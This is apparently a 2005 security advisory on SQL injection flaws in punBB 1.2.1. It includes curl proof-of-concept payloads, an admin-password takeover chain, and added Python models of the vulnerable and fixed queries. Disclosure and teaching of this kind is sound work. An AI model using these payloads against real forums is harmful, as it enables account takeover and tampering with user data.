
Multiple vulns in punBB

Subject: Multiple vulns in punBB
Date: Thu, 24 Feb 2005 20:21:09 +0000
...

 - Johannes Gumbel

=================================================
   SQL Injections in punbb-1.2.1 register.php
=================================================

 Description
 -----------

A remote attacker can make register.php execute
arbitrary SQL statements by supplying malicious
values in the language or email parameter.

The email parameter is guarded by the function
is_valid_email, but this function does no real
filtering and will pass any SQL statement as long
as it is formatted to satisfy the check.

This also affects systems using the magic_quotes_gpc
option in php.ini.

 Proof of concept
 ----------------

This example only demonstrates the vulnerability in
the language parameter.

curl --form form_sent=1 --form req_username=sha --form req_password1=passwd \
  --form req_password2=passwd --form req_email1=sha@punbb.com \
  --form language="English', 'Oxygen', 0, '0.0.0.0', 0) -- " \
  http://target/register.php?action=registerer

This creates a user with language English, style
Oxygen and registration IP 0.0.0.0, all supplied by
the attacker instead of the application.
=======================================================
  Multiple vulnerabilities in punbb-1.2.1 profile.php
=======================================================

 Description
 -----------

A remote attacker without an account can set the password
of any user on the system to NULL, effectively locking
them out of the system.

A user with an account can also inject an arbitrary
SQL statement through the change-email feature. This is
caused by a fault in the is_valid_email function, which
returns true for strings that are nowhere near a valid
email address.

This also affects systems using the magic_quotes_gpc
option in php.ini.

By combining these two an attacker with an account on
the forum can change the password for any user to anything
he/she wants to, gaining full access to the administrator
account.

 Proof of concept
 ----------------

Examples of the damage the DoS attack and the arbitrary
SQL statement attack can do on their own are omitted.
This is a demonstration of what they can do when
combined.

Assumptions for this particular example:
 - There is a user on the system with id 3 whose
   username/password is 'sha'/'passwd'.
 - The cookie is valid for sha on the system.
 - The system supports sha1.
 - The new password for the id 2 account is to
   be 'newpass'.

curl --cookie punbb_cookie=<valid cookie> --form form_sent=1 \
  --form req_new_email="6c55803d6f1d7a177a0db3eb4b343b0d50f9c111' -- sha@punbb.com" \
  http://target/profile.php?action=change_email\&id=3

This pushes the SHA-1 hash of 'newpass' into every
user's activate_string field. All that remains is to
move that field into the password field of whichever
user we choose, using the other bug:

curl http://target/profile.php?action=change_pass\&id=2\&key=

Now the account with user id 2 has the password 'newpass'.
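The two injection points above and the password-reset logic they are chained with, modelled as an added example (this is not punBB's code or the advisory author's): a cut-down users table in SQLite, the register.php INSERT and the profile.php UPDATE built by string interpolation the way the advisory describes, the reset step that accepts an empty key, and hardened versions of each. The column names, the query shapes and the loose key comparison in change_pass are assumptions of the model; the language payload is the one from the register.php proof of concept.

```python
import hashlib
import hmac
import sqlite3

# Constructed schema: a cut-down users table with only the columns the
# advisory's payloads touch.  Column names and query shapes are assumptions
# made for this example, not punBB's own schema or code.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT,
    email TEXT, language TEXT, style TEXT, registered INTEGER,
    registration_ip TEXT, last_visit INTEGER, activate_string TEXT,
    activate_key TEXT);
INSERT INTO users VALUES (2, 'admin', 'adminhash', 'admin@example.test',
    'English', 'Oxygen', 1, '10.0.0.1', 1, NULL, NULL);
INSERT INTO users VALUES (3, 'sha', 'shahash', 'sha@punbb.com',
    'English', 'Oxygen', 1, '10.0.0.2', 1, NULL, NULL);
"""
INSERT_COLS = ("username, password, email, language, style, registered, "
               "registration_ip, last_visit")
# The language value from the advisory's register.php proof of concept.
LANGUAGE_PAYLOAD = "English', 'Oxygen', 0, '0.0.0.0', 0) -- "

def fresh_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db

def sha1_hex(text):
    return hashlib.sha1(text.encode()).hexdigest()

def user_row(db, username):
    return db.execute("SELECT language, registration_ip FROM users "
                      "WHERE username = ?", (username,)).fetchone()

def password_of(db, user_id):
    return db.execute("SELECT password FROM users WHERE id = ?",
                      (user_id,)).fetchone()[0]

def register_vulnerable(db, username, email, language, client_ip):
    """register.php model: language is interpolated unescaped, so the payload
    closes the VALUES list itself and comments out the application's tail."""
    db.execute(f"INSERT INTO users ({INSERT_COLS}) VALUES ('{username}', 'x', "
               f"'{email}', '{language}', 'Oxygen', 1, '{client_ip}', 1)")
    return user_row(db, username)

def register_fixed(db, username, email, language, client_ip):
    """Every value bound as a parameter: the payload is stored as plain text."""
    db.execute(f"INSERT INTO users ({INSERT_COLS}) VALUES (?, 'x', ?, ?, "
               "'Oxygen', 1, ?, 1)", (username, email, language, client_ip))
    return user_row(db, username)

def change_email_vulnerable(db, user_id, new_email):
    """profile.php change_email model: the address passes a weak format check
    and is interpolated; the ' -- in the payload discards the WHERE clause,
    so every row's activate_string is overwritten."""
    key = sha1_hex(new_email)[:8]  # stands in for the key mailed to the user
    db.execute(f"UPDATE users SET activate_string='{new_email}', "
               f"activate_key='{key}' WHERE id={int(user_id)}")

def change_pass_vulnerable(db, user_id, key):
    """profile.php change_pass model.  Assumed flaw: an unset activate_key and
    an empty ?key= compare equal, so activate_string (NULL by default) is
    copied into password with no credential presented at all."""
    row = db.execute("SELECT activate_string, activate_key FROM users "
                     "WHERE id = ?", (user_id,)).fetchone()
    if row is None or (row[1] or "") != key:
        return False
    db.execute("UPDATE users SET password = ?, activate_string = NULL, "
               "activate_key = NULL WHERE id = ?", (row[0], user_id))
    return True

def change_pass_fixed(db, user_id, key):
    """Require a key on both sides and compare it in constant time."""
    row = db.execute("SELECT activate_string, activate_key FROM users "
                     "WHERE id = ?", (user_id,)).fetchone()
    if (not key or row is None or row[1] is None
            or not hmac.compare_digest(row[1].encode(), key.encode())):
        return False
    db.execute("UPDATE users SET password = ?, activate_string = NULL, "
               "activate_key = NULL WHERE id = ?", (row[0], user_id))
    return True

def takeover(db, attacker_id, victim_id, new_password):
    """The chain from the advisory: plant the hash of the chosen password in
    every activate_string, then reset the victim with an empty key."""
    new_hash = sha1_hex(new_password)
    change_email_vulnerable(db, attacker_id, new_hash + "' -- sha@punbb.com")
    return (change_pass_vulnerable(db, victim_id, "")
            and password_of(db, victim_id) == new_hash)

if __name__ == "__main__":
    db = fresh_db()
    print(register_vulnerable(db, "newuser", "new@example.test",
                              LANGUAGE_PAYLOAD, "198.51.100.7"))
    print(takeover(db, 3, 2, "newpass"))
```

The fix is the same in both files: every value that reaches the query goes through a placeholder (or, in PHP of that era, the database layer's escape function), and the reset step refuses an empty or missing key. Neither magic_quotes_gpc nor a stricter is_valid_email closes the hole on its own.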
==============================================
  SQL Injections in punbb-1.2.1 moderate.php
==============================================

 Description
 -----------

Improper handling of several arguments in
moderate.php allows a malicious moderator (or admin)
to inject arbitrary SQL statements.

This also affects systems using the magic_quotes_gpc
option in php.ini.

 Proof of concept
 ----------------

These examples do nothing malicious and do not even
make the system report an error. Instead they are
crafted so that adding a ; or ' just before the
comment "-- this won't show" makes the SQL query
fail, demonstrating that injection is possible.

Assumptions:
 - punbb_cookie identifies a moderator of the
   forum with id 1.

Attack on delete posts:
curl --referer http://target/moderate.php --form posts="0) -- this won't show" \
  --form delete_posts_comply=1 --cookie punbb_cookie=<valid cookie> \
  http://target/moderate.php?fid=1\&tid=1

Attack on move topics:
curl --referer http://target/moderate.php --form topics="2) -- this won't show" \
  --form move_to_forum=2 --form move_topics=1 --form move_topics_to=1 \
  --cookie punbb_cookie=<valid cookie> http://target/moderate.php?fid=1

Attack on delete topics:
curl --referer http://target/moderate.php --form topics="2) -- this won't show" \
  --form delete_topics=1 --form delete_topics_comply=1 \
  --cookie punbb_cookie=<valid cookie> http://target/moderate.php?fid=1

Attack on open/close:
curl --referer http://target/moderate.php --form "topics[0) -- this won't show]=" \
  --form open=1 --cookie "punbb_cookie=<valid cookie>" \
  http://target/moderate.php?fid=1
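The moderate.php probes above, modelled as an added example (not punBB's code or the advisory's): a constructed posts table in SQLite, a delete that drops the posts value straight into IN (...) the way the advisory describes, the probe technique of comparing a value that parses cleanly against the same value with a stray quote, and the hardened version that admits only integer ids. The table and query shape are assumptions of the model.

```python
import sqlite3

# Constructed posts table for this example; not punBB's schema.
SCHEMA = ("CREATE TABLE posts (id INTEGER PRIMARY KEY, topic_id INTEGER);"
          "INSERT INTO posts VALUES (1, 1), (2, 1), (3, 2);")

def fresh_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db

def remaining(db):
    return db.execute("SELECT count(*) FROM posts").fetchone()[0]

def delete_posts_vulnerable(db, posts):
    """moderate.php model: the comma-separated posts value is dropped into
    IN (...) unescaped, which is what the advisory's probes rely on."""
    db.execute(f"DELETE FROM posts WHERE id IN ({posts})")
    return remaining(db)

def probe(db, posts):
    """The advisory's detection technique: a value that closes the list
    cleanly parses and changes nothing; the same value with a stray quote
    makes the query fail.  The difference reveals the injection."""
    try:
        delete_posts_vulnerable(db, posts)
        return "no error"
    except sqlite3.Error:
        return "sql error"

def parse_id_list(posts):
    """Hardened handling: every element must be a decimal integer, which is
    all a post or topic id can legitimately be."""
    ids = []
    for item in posts.split(","):
        item = item.strip()
        if not item.isdigit():
            raise ValueError(f"bad id: {item!r}")
        ids.append(int(item))
    return ids

def accepts(posts):
    """True if the hardened parser lets the value through."""
    try:
        parse_id_list(posts)
        return True
    except ValueError:
        return False

def delete_posts_fixed(db, posts):
    """Validated ids bound as parameters; the query text never contains input."""
    ids = parse_id_list(posts)
    marks = ",".join("?" * len(ids))
    db.execute(f"DELETE FROM posts WHERE id IN ({marks})", ids)
    return remaining(db)

if __name__ == "__main__":
    db = fresh_db()
    print(probe(db, "0) -- this won't show"))    # parses, nothing deleted
    print(probe(db, "0') -- this won't show"))   # the stray quote breaks the query
    print(accepts("1, 3"), accepts("0) -- this won't show"))
```

The same integer check applies to the topics value and to each key of the topics[] array used by the open/close form; a value such as "0) OR 1=1 -- this won't show" (a constructed example, not from the advisory) shows why the harmless probe matters, since it empties the table through the vulnerable path and is rejected by the hardened one.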